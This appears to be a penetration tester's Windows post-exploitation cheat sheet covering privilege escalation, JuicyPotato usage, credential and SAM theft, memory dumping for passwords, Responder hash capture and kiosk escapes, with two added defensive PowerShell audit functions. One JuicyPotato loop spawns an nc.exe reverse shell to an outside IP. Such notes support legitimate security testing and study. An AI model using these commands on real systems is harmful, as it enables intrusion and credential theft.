akde/infosec

Information security is ultimately about managing risk


  1. Perform basic Windows system enumeration
  2. Enumerate the file system(s)
  3. Run privilege escalation scripts
  4. Check the Windows Service Exploitation post
  5. Run Metasploit post-exploitation modules
  6. Run Empire post-exploitation modules
    • Execute PowerUp
  7. Try other stuff
  8. Perform the steps again.

After these steps, more things to do:

Work with processes

For enumeration of processes, see the Basic Windows system enumeration post.

Kill a process

taskkill /PID $pid
taskkill /IM notepad.exe

pskill /accepteula $pid // With Sysinternals tools

Suspend and resume a running process with Sysinternals tools:

pssuspend /accepteula notepad.exe
...
pssuspend /accepteula -r notepad.exe

Work with DLLs

Show all loaded unsigned DLLs on the system. This can help to detect malicious code.

listdlls /accepteula -u // With Sysinternals tools; -u lists only unsigned DLLs
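As an added example (not from the original page), the same unsigned-DLL check done in PowerShell without Sysinternals: the function name Get-UnsignedLoadedModule is my own, and it relies only on Get-Process and Get-AuthenticodeSignature.

```powershell
# Added example (not from the original page): list loaded DLLs whose
# Authenticode signature is missing or invalid, across every process we can read.
# Run from an elevated session to see modules of other users' processes.
function Get-UnsignedLoadedModule {
    [CmdletBinding()]
    param(
        # Optional: restrict to one process name, e.g. 'notepad'; '*' means all
        [string]$ProcessName = '*'
    )

    $seen = @{}   # de-duplicate by path: a DLL loaded in many processes is checked once
    foreach ($proc in Get-Process -Name $ProcessName -ErrorAction SilentlyContinue) {
        # Protected processes throw "Access is denied" on .Modules; treat them as empty
        $modules = try { $proc.Modules } catch { @() }
        foreach ($m in $modules) {
            $path = $m.FileName
            if (-not $path -or $seen.ContainsKey($path)) { continue }
            $seen[$path] = $true

            $sig = Get-AuthenticodeSignature -FilePath $path -ErrorAction SilentlyContinue
            # 'Valid' means the chain verifies to a trusted root; everything else is reported
            if ($null -eq $sig -or $sig.Status -ne 'Valid') {
                [pscustomobject]@{
                    Process    = $proc.ProcessName
                    PID        = $proc.Id
                    Module     = $path
                    Status     = if ($sig) { $sig.Status } else { 'Unreadable' }
                    Signer     = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '' }
                    # Hits under System32 deserve a comparison against a known-good host
                    InSystem32 = $path -like "$env:SystemRoot\System32\*"
                }
            }
        }
    }
}

# Usage: modules outside System32 sort first, since those are the usual suspects
Get-UnsignedLoadedModule | Sort-Object InSystem32, Module | Format-Table -AutoSize
```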

Various topics

  • Bypassing Windows protection mechanisms.
    1. Execution
    2. Firewall
    3. UAC
    4. Windows Defender
  • Add an RDP account and log in via the GUI.
  • Monitor the live system
  • If the AlwaysInstallElevated values are 1 from this query:
    reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
    then see here.
  • Check the list of kernel exploits for the current system.
  • Run Responder to see traffic
  • Get SAM files
  • Browse through logs in PowerShell, e.g. to see the events of one user. More info here.
    Get-EventLog -LogName $logName -UserName ryan
  • Execute a command as another user:
    runas /user:userName cmd.exe
  • If you don't have access to a file you want:
    • Check permissions on the file with icacls.
    • Check permissions with icacls on the directory as well.
    • Check the various dir switches to see special permissions and alternate data streams.
    • Try to grant yourself full control over the file (icacls /grant changes the ACL, not the owner):
      icacls root.txt /grant alfred:F
  • If you can execute a GUI program with elevated privileges, open the "open" dialog, enter file://c:/windows/system32/cmd.exe as the path and click "open".
  • If you have access to a system but no NTLM hashes, try to connect to your own server running Responder to capture an NTLM hash.
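As an added example (not from the original page) for the AlwaysInstallElevated item above, a PowerShell audit that reads the value from both hives and can reset it; the function name Test-AlwaysInstallElevated is my own.

```powershell
# Added example (not from the original page): audit the AlwaysInstallElevated
# policy in both hives and optionally reset it. The policy is only effective
# when BOTH the HKLM and HKCU values are 1; either one alone does nothing.
function Test-AlwaysInstallElevated {
    [CmdletBinding()]
    param(
        # Set the value to 0 in every hive where it is present and non-zero
        [switch]$Remediate
    )
    $subKey = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
    $hives  = @{ HKLM = "HKLM:\$subKey"; HKCU = "HKCU:\$subKey" }
    $state  = @{}

    foreach ($name in $hives.Keys) {
        $path  = $hives[$name]
        $value = Get-ItemProperty -Path $path -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        # A missing key or value means the policy is not configured, i.e. off
        $state[$name] = if ($value) { [int]$value.AlwaysInstallElevated } else { 0 }

        if ($Remediate -and $state[$name] -ne 0) {
            Set-ItemProperty -Path $path -Name AlwaysInstallElevated -Value 0 -Type DWord
            $state[$name] = 0
        }
    }

    [pscustomobject]@{
        HKLM       = $state.HKLM
        HKCU       = $state.HKCU
        # Both at 1: any user can install an MSI that runs as SYSTEM
        Vulnerable = ($state.HKLM -eq 1 -and $state.HKCU -eq 1)
    }
}

Test-AlwaysInstallElevated              # report only
# Test-AlwaysInstallElevated -Remediate # writing the HKLM value needs admin rights
```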

External resources

Various things to use and remember

  • Need details about a command?
    help $command
  • Built-in commands (type help for the complete list):
    • Show file attributes:
      attrib $file
    • Show (and change!) the ACLs of a file:
      cacls $file
      icacls $file // can also modify!
    • Diff / compare two files:
      comp $f1 $f2
      or
      fc $f1 $f2
    • The command fsutil gives information about the file systems. Useful subcommands:
      fsutil fsInfo drives // Returns all available drives
      fsutil quota ... // Manage quota limits
    • Show / set the executable search path:
      path
    • Show / set environment variables:
      set
  • Grepping through large output with findstr (Manpage):
    • Find a string, case-insensitive:
      dir /s /a | findstr /i /C:password
    • Find all lines that don't include a string:
      dir /s /a | findstr /i /v /C:TEMP
    • Find all lines that start with a string:
      dir /s /a | findstr /i /b /C:bla
    • Find all lines that end with a string:
      dir /s /a | findstr /i /e /C:.docx
  • How to download files with notepad:

Ideas of despair

  • Some processes can hold sensitive data in their memory. Check if an interesting process is running (browser!). Use procdump.exe to dump the memory and analyze it locally (e.g. with strings <dump>, a hex editor, or grep for a password string or a known user string).
    procdump64.exe -accepteula -ma $pid
  • Execute driverquery /v and search for kernel driver exploits.
  • Check alternate data streams
  • Try JuicyPotato
    • The privilege SeImpersonate or SeAssignPrimaryToken is needed.
    • Example: JuicyPotato.exe -t * -p "C:\Temp\p64_443.exe" -l 5542
    • If the error COM -> recv failed with error: 10038 occurs, check other CLSIDs. (See also the juicy_potato_clsid_runner.bat script.)
    • Read credentials for users (DPAPI etc.): https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde/view/Discussions#content
    • Alternative: Try churrasco
    • Or see the MS10-059 exploit in the windows-kernel-exploits directory. (Open an nc handler locally, execute MS10-059.exe on the victim with your own IP and port.)
    • Try all CLSIDs from the command line:
      for /F "tokens=*" %A in (clsids2.txt) do Juicy.Potato.x86.exe -t * -p C:\Temp\s32.exe -l 5542 -c %A
      for /F "tokens=*" %A in (clsids2.txt) do Juicy.Potato.x86.exe -t * -p C:\windows\system32\cmd.exe -a "/c C:\wamp\www\nc.exe -e cmd.exe 192.168.49.179 80" -l 5542 -c %A
  • Some applications no longer work, but older versions may. Try an old attacking machine or an older version of previously tried software.

Kiosk mode escape

  • You can download in open dialogs.
  • Try to open other processes from within the allowed application.
  • Try to open an Explorer window.
  • Type "explorer" into an Explorer window to start a Windows setup script.
  • Upload a base64-encoded file via HTTP in the Notepad open dialog and decode it with certutil.
  • Execute via DLL or rundll32 or as a screensaver.
